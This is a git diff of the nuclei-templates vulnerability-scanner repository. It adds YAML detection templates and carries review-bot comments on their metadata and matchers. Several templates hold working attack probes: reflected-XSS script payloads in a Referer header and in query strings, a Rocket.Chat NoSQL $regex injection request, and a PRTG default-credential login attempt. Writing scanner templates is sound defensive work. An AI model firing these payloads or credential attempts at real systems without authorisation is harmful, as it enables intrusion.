Merge branch 'projectdiscovery:master' into master
commit
0d5ed545fb
|
@ -1,26 +0,0 @@
|
|||
cves/2016/CVE-2016-10368.yaml
|
||||
cves/2017/CVE-2017-17736.yaml
|
||||
cves/2019/CVE-2019-8086.yaml
|
||||
cves/2020/CVE-2020-13820.yaml
|
||||
cves/2020/CVE-2020-2733.yaml
|
||||
cves/2021/CVE-2021-25104.yaml
|
||||
cves/2021/CVE-2021-36873.yaml
|
||||
cves/2022/CVE-2022-2546.yaml
|
||||
cves/2022/CVE-2022-2551.yaml
|
||||
cves/2022/CVE-2022-2633.yaml
|
||||
cves/2022/CVE-2022-31814.yaml
|
||||
default-logins/aem/aem-felix-console.yaml
|
||||
default-logins/oracle/peoplesoft-default-login.yaml
|
||||
exposed-panels/aircube-login.yaml
|
||||
exposed-panels/oracle-business-intelligence.yaml
|
||||
exposed-panels/webpagetest-panel.yaml
|
||||
exposures/files/sendgrid-env.yaml
|
||||
file/bash/bash.yaml
|
||||
misconfiguration/aem/aem-bulkeditor.yaml
|
||||
misconfiguration/aem/aem-custom-script.yaml
|
||||
misconfiguration/aem/aem-dump-contentnode.yaml
|
||||
technologies/moveit-transfer-detect.yaml
|
||||
technologies/oracle/oracle-access-manager-detect.yaml
|
||||
technologies/zend-server-test-page.yaml
|
||||
vulnerabilities/other/webpagetest-ssrf.yaml
|
||||
vulnerabilities/wordpress/age-gate-xss.yaml
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
|
||||
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
|
||||
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
|
||||
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
|
||||
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
|
||||
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
|
||||
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
|
||||
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
|
||||
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
|
||||
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
|
||||
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
|
||||
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
|
||||
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
|
||||
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
|
||||
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
|
||||
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
|
||||
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
|
||||
|
||||
**297 directories, 4270 files**.
|
||||
**299 directories, 4307 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
3973
TEMPLATES-STATS.md
3973
TEMPLATES-STATS.md
File diff suppressed because it is too large
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1444 | daffainfo | 631 | cves | 1421 | info | 1482 | http | 3894 |
|
||||
| panel | 663 | dhiyaneshdk | 594 | exposed-panels | 670 | high | 1031 | file | 76 |
|
||||
| edb | 565 | pikpikcu | 329 | vulnerabilities | 513 | medium | 818 | network | 52 |
|
||||
| lfi | 513 | pdteam | 269 | technologies | 283 | critical | 483 | dns | 17 |
|
||||
| xss | 496 | geeknik | 192 | exposures | 280 | low | 228 | | |
|
||||
| wordpress | 422 | dwisiswant0 | 169 | misconfiguration | 240 | unknown | 11 | | |
|
||||
| exposure | 415 | 0x_akoko | 166 | token-spray | 230 | | | | |
|
||||
| cve2021 | 353 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 338 | ritikchaddha | 137 | default-logins | 103 | | | | |
|
||||
| wp-plugin | 319 | pussycat0x | 133 | file | 76 | | | | |
|
||||
| cve | 1459 | daffainfo | 633 | cves | 1438 | info | 1491 | http | 3929 |
|
||||
| panel | 667 | dhiyaneshdk | 606 | exposed-panels | 674 | high | 1066 | file | 77 |
|
||||
| edb | 573 | pikpikcu | 329 | vulnerabilities | 515 | medium | 776 | network | 52 |
|
||||
| lfi | 513 | pdteam | 270 | technologies | 287 | critical | 513 | dns | 17 |
|
||||
| xss | 504 | geeknik | 193 | exposures | 281 | low | 228 | | |
|
||||
| wordpress | 430 | dwisiswant0 | 169 | misconfiguration | 246 | unknown | 14 | | |
|
||||
| exposure | 419 | 0x_akoko | 167 | token-spray | 230 | | | | |
|
||||
| cve2021 | 356 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 138 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 327 | pussycat0x | 135 | file | 77 | | | | |
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2020-20285
|
||||
|
||||
info:
|
||||
name: zzcms - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
|
||||
reference:
|
||||
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2020-20285
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
fofa-query: zzcms
|
||||
verified: "true"
|
||||
tags: cve,cve2020,zzcms,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /user/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: xss"/><img src="#" onerror="alert(document.domain)"/>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
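Review bot: `verified: "true"` in the metadata block is a quoted string, while the panel and misconfiguration templates added in this same commit write the boolean `verified: true`. The quoted form also appears in the new CVE-2021-22911, CVE-2022-1910 and CVE-2022-38553 templates. Tooling that filters on this field by type may treat the two forms differently, so I would use `verified: true` in all four. The description would also be clearer if it said the Referer header sent to user/login.php is reflected into the page unescaped, which is what the `fromurl` matcher checks.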
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35489
|
||||
- https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/
|
||||
- https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/
|
||||
- https://wordpress.org/plugins/contact-form-7/#developers
|
||||
- https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/
|
||||
classification:
|
||||
|
|
|
@ -24,17 +24,19 @@ requests:
|
|||
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
||||
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'rel=\"admin\"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-22911
|
||||
info:
|
||||
name: RocketChat - NoSQL injection
|
||||
author: tess,sullo
|
||||
severity: critical
|
||||
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
|
||||
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
|
||||
- https://hackerone.com/reports/1130721
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
|
||||
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-22911
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
shodan-query: http.title:"Rocket.Chat"
|
||||
verified: "true"
|
||||
tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |-
|
||||
POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"message": "{\"msg\":\"method\", \"method\": \"getPasswordPolicy\", \"params\": [{\"token\": {\"$regex\": \"^{{randstr}}\"}}] }"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '[error-invalid-user]'
|
||||
- '"success":true'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
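Review bot: The description lists the affected versions as "3.11, 3.12 and 3.1", and the last entry looks truncated. As far as I recall, the NVD entry linked in the references names 3.13, so please confirm against it and correct the line, e.g. `description: Rocket.Chat server 3.11, 3.12 and 3.13 allow unauthenticated access to an API endpoint, which leads to NoSQL injection in the database.` Anyone triaging a hit from this template will use that line to decide which installations need patching, so the version list has to be right.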
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1910
|
||||
|
||||
info:
|
||||
name: Shortcodes and extra features for Phlox theme < 2.9.8 - Cross-Site-Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
|
||||
- https://wordpress.org/plugins/auxin-elements/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1910
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'widget-title"><script>alert(document.domain)</script></h3>'
|
||||
- 'aux-widget'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
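Review bot: The tags line carries `cve2017`, but the template id and `cve-id` are both CVE-2022-1910. A run filtered on the year tag will skip this template for 2022 and pull it in for 2017. The line should read `tags: wordpress,xss,auxin-elements,wpscan,cve,cve2022,wp-plugin,wp`.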
|
|
@ -18,7 +18,7 @@ info:
|
|||
cwe-id: CWE-77
|
||||
metadata:
|
||||
shodan-query: http.component:"BitBucket"
|
||||
tags: cve,cve2022,bitbucket,atlassian
|
||||
tags: cve,cve2022,bitbucket,atlassian,kev
|
||||
|
||||
variables:
|
||||
data: '{{rand_base(5)}}'
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-38553
|
||||
|
||||
info:
|
||||
name: Academy Learning Management System < v5.9.1 - Reflected XSS
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
|
||||
reference:
|
||||
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
|
||||
- https://github.com/4websecurity/CVE-2022-38553
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
|
||||
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-38553
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-query: intext:"Study any topic, anytime"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,academylms,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
- 'Study any topic'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: prtg-default-login
|
||||
|
||||
info:
|
||||
name: PRTG Network Monitor Default Login
|
||||
author: johnk3r
|
||||
severity: high
|
||||
description: PRTG default admin credentials were discovered.
|
||||
reference:
|
||||
- https://www.paessler.com/manuals/prtg/login
|
||||
classification:
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:-655683626
|
||||
tags: prtg,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/checklogin.htm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginurl=&username={{username}}&password={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- prtgadmin
|
||||
password:
|
||||
- prtgadmin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "OCTOPUS"
|
||||
- "/home"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
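Review bot: The word matcher looks for `/home` anywhere in the response headers, so it is not tied to the redirect target that presumably signals a successful login. Together with the `OCTOPUS` word and the 302 status the false-positive risk is probably low, but anchoring on the header name would make the intent explicit. I would replace the `/home` word with a regex matcher on `part: header` such as `- '(?i)location:.*/home'`, after confirming against a real instance what the Location value is for a successful and for a failed login.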
|
|
@ -0,0 +1,30 @@
|
|||
id: remedy-axis-login
|
||||
|
||||
info:
|
||||
name: Remedy Axis Login
|
||||
author: tess
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.html:"BMC Remedy"
|
||||
verified: true
|
||||
tags: panel,remedy,bmc
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
- '{{BaseURL}}/arsys/shared/login.jsp'
|
||||
- '{{BaseURL}}/rsso/admin/'
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "BMC Remedy Mid Tier "
|
||||
- "Remedy Login Page"
|
||||
- "BMC Remedy"
|
||||
- "BMC Smart Reporting"
|
||||
condition: or
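Review bot: Under `condition: or` the bare `"BMC Remedy"` entry already matches everything that `"BMC Remedy Mid Tier "` would, so the first word is redundant. There is also no status matcher, so any page whose body mentions the product name on `{{BaseURL}}` is reported as a login panel. I would drop the bare `- "BMC Remedy"` entry, keep the more specific strings, and add a `status: 200` matcher under `matchers-condition: and`. The template also has no `description` or `reference`, which the other panel templates in this commit mostly provide.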
|
|
@ -0,0 +1,33 @@
|
|||
id: somansa-dlp-detect
|
||||
|
||||
info:
|
||||
name: Somansa DLP Center Detection
|
||||
author: gy741,ritikchaddha
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.somansa.com/solution/integrated_solution/dlp/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"DLP system"
|
||||
tags: panel,somansa,dlp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/DLPCenter/loginform.sms"
|
||||
- "{{BaseURL}}/DLPCenter/images/favicon.ico"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/DLPCenter/js/"
|
||||
- "SOMANSA"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200 && (\"-1217239281\" == mmh3(base64_py(body)))"
|
|
@ -0,0 +1,26 @@
|
|||
id: wampserver-homepage
|
||||
|
||||
info:
|
||||
name: WAMPSERVER Homepage
|
||||
author: DhiyaneshDk
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"WAMPSERVER Homepage"
|
||||
tags: panel,wampserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>WAMPSERVER Homepage</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,20 +0,0 @@
|
|||
id: xenforo-login
|
||||
|
||||
info:
|
||||
name: XenForo Login/Register
|
||||
author: dhiyaneshDk
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"XenForo"
|
||||
tags: panel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>XenForo</title>'
|
||||
condition: and
|
|
@ -1,13 +1,14 @@
|
|||
id: hp-color-laserjet-detect
|
||||
|
||||
info:
|
||||
name: HP Color LaserJet detection
|
||||
name: HP Color LaserJet Detection
|
||||
author: idealphase,gy741
|
||||
severity: info
|
||||
reference:
|
||||
- http://www.hp.com/
|
||||
- https://www.hp.com/us-en/shop/cv/printers
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"HP Color LaserJet"
|
||||
google-query: intitle:"HP Color LaserJet"
|
||||
tags: iot,hp
|
||||
|
@ -16,15 +17,21 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/hp/device/this.LCDispatcher"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>HP Color LaserJet"
|
||||
- "HP Color LaserJet"
|
||||
- '<td class="mastheadTitle"><h1>HP Color LaserJet'
|
||||
- '<strong class="product">HP Color LaserJet'
|
||||
- '<a href="info_deviceStatus.html?'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -16,7 +16,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/content.infinity.json"
|
||||
- "{{BaseURL}}{{path}}"
|
||||
- "{{BaseURL}}/{{path}}"
|
||||
|
||||
iterate-all: true
|
||||
extractors:
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: atlassian-bamboo-build
|
||||
|
||||
info:
|
||||
name: Atlassian Bamboo Build Dashboard
|
||||
author: DhiyaneshDK
|
||||
severity: unknown
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Build Dashboard - Atlassian Bamboo"
|
||||
tags: misconfig,atlassian,bamboo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/allPlans.action"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<th>Project</th>"
|
||||
- "<th>Plan</th>"
|
||||
- "<th>Build</th>"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: gitea-public-signup
|
||||
|
||||
info:
|
||||
name: Gitea Public Registration Enabled
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
A misconfiguration in Gitea allows arbitrary users to sign up and read code hosted on the service.
|
||||
reference:
|
||||
- https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s
|
||||
- https://gitea.io/en-us/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"Powered by Gitea"
|
||||
tags: misconfig,gitea
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/user/sign_up'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Powered by Gitea Version'
|
||||
- 'Register -'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Registration is disabled. Please contact your site administrator."
|
||||
negative: true
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
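Review bot: The matchers only establish that `/user/sign_up` renders a registration form without the "Registration is disabled" notice. They do not show that an account can actually be created (email confirmation, captcha or manual approval may still apply) or that any non-public repository becomes readable. `severity: high` and the description's claim about reading hosted code therefore go beyond what the template verifies. I would reword the description to something like `Gitea exposes its self-registration form; depending on instance settings, anyone may be able to create an account.` and consider a lower severity. The first word matcher also omits `part: body`, which the second one sets explicitly.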
|
|
@ -0,0 +1,30 @@
|
|||
id: unauth-kubecost
|
||||
info:
|
||||
name: KubeCost - Unauthenticated Dashboard Exposure
|
||||
author: pussycat0x
|
||||
severity: medium
|
||||
reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:kubecost
|
||||
tags: misconfig,exposure,unauth,kubecost
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/overview.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Cluster Overview | Kubecost</title>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
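Review bot: `reference:` is written as a single scalar here, whereas every other template in this commit gives it as a list; tooling that iterates the field may not handle both shapes. I would write it as `reference:` followed by `- https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478`. A social-media photo is also a weak reference for a finding rated medium, so a link to vendor documentation on dashboard authentication would help whoever has to remediate. The template has no `description` either.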
|
|
@ -15074,4 +15074,9 @@ requests:
|
|||
words:
|
||||
- Powered by <a href='http://zzzcms.com'>ZZZcms</a>
|
||||
|
||||
- type: word
|
||||
name: bitwarden
|
||||
words:
|
||||
- <title page-title>Bitwarden Web Vault</title>
|
||||
|
||||
# Enhanced by cs on 2022/02/08
|
||||
|
|
|
@ -13,6 +13,7 @@ requests:
|
|||
path:
|
||||
- '{{BaseURL}}/oamfed/idp/soap'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: xenforo-detect
|
||||
|
||||
info:
|
||||
name: XenForo Forum Detection
|
||||
author: dhiyaneshDk,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"XenForo"
|
||||
tags: tech,xenforo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<html id="XenForo"'
|
||||
- '<html id="XF"'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,34 @@
|
|||
id: unauthenticated-duplicator-disclosure
|
||||
|
||||
info:
|
||||
name: WordPress Duplicator Plugin - Information disclosure
|
||||
author: tess
|
||||
severity: medium
|
||||
description: |
|
||||
Unauthenticated Information disclosure of Duplicator WordPress plugin sensitive files.
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wordpress,wp,wp-plugin,misconfig,disclosure,unauth,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
|
||||
- "{{BaseURL}}/wp-content/backups-dup-lite"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Index of /wp-content/backups-dup-lite/'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
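Review bot: The second path, `"{{BaseURL}}/wp-content/backups-dup-lite"`, has no trailing slash and the request block does not enable redirects. On common web servers a directory requested without the slash is answered with a redirect rather than a 200, so that path would likely never satisfy the status matcher. I would write it as `- "{{BaseURL}}/wp-content/backups-dup-lite/"`. A `reference` entry and a line in the description on remediation (disable directory listing, remove leftover backup archives) would also make the finding easier to act on.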
|